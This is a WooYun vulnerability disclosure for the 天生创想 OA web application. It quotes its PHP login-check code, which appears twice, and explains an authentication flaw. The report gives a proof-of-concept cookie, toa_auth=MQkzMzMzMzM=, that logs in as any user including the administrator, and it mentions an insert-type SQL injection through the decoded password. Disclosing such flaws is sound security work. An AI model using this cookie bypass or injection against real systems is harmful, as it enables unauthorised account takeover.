乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-11-21: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-02-19: 厂商已经主动忽略漏洞,细节向公众公开
天生创想oa任意用户登陆,包括管理员,附加一枚注入
function check_user() { if ( !$auth = get_cookie('auth') ) return false; list($uid, $password ) = explode("\t", authcode($auth, 'DECODE')); #echo 'uid='.$uid."||password=".$password; if (is_numeric($uid)){ $sql = "SELECT * FROM ".DB_TABLEPRE."session WHERE uid = '$uid' AND password = '".addslashes($password)."'"; #echo $sql; if ( $result = $this->db->fetch_one_array($sql) ) { $this->id = $result['uid']; $this->name = addslashes($result['username']); $this->groupid = $result['groupid']; }else { $sql = "SELECT id AS uid,username,password,groupid,userkey FROM ".DB_TABLEPRE."user WHERE ischeck = 1 AND id = '$uid'"; if ( $result = $this->db->fetch_one_array($sql) ) { $this->id = $result['uid']; $this->name = addslashes($result['username']); $this->groupid = $result['groupid']; $result['password'] = $password; unset($result['userkey']); $this->add_session($result); } } } if (!$this->id ) { $this->logout(); } function check_user() { if ( !$auth = get_cookie('auth') ) return false; list($uid, $password ) = explode("\t", authcode($auth, 'DECODE')); #echo 'uid='.$uid."||password=".$password; if (is_numeric($uid)){ $sql = "SELECT * FROM ".DB_TABLEPRE."session WHERE uid = '$uid' AND password = '".addslashes($password)."'"; #echo $sql; if ( $result = $this->db->fetch_one_array($sql) ) { $this->id = $result['uid']; $this->name = addslashes($result['username']); $this->groupid = $result['groupid']; }else { $sql = "SELECT id AS uid,username,password,groupid,userkey FROM ".DB_TABLEPRE."user WHERE ischeck = 1 AND id = '$uid'"; if ( $result = $this->db->fetch_one_array($sql) ) { $this->id = $result['uid']; $this->name = addslashes($result['username']); $this->groupid = $result['groupid']; $result['password'] = $password; unset($result['userkey']); $this->add_session($result); } } } if (!$this->id ) { $this->logout(); } } }
流程上,查询失败时,更新外部输入的密码,插入数据库中,保存的会话表内流程访问:http://127.0.0.1/home.php添加cookie:toa_auth=MQkzMzMzMzM=成功登陆至设备。同事,$password 是base64解码输入,未作过滤,存在insert型的sql注入
流程访问:http://127.0.0.1/home.php添加cookie:toa_auth=MQkzMzMzMzM=再次访问,就进入系统了
奇葩的逻辑,修复你们自己懂的
未能联系到厂商或者厂商积极拒绝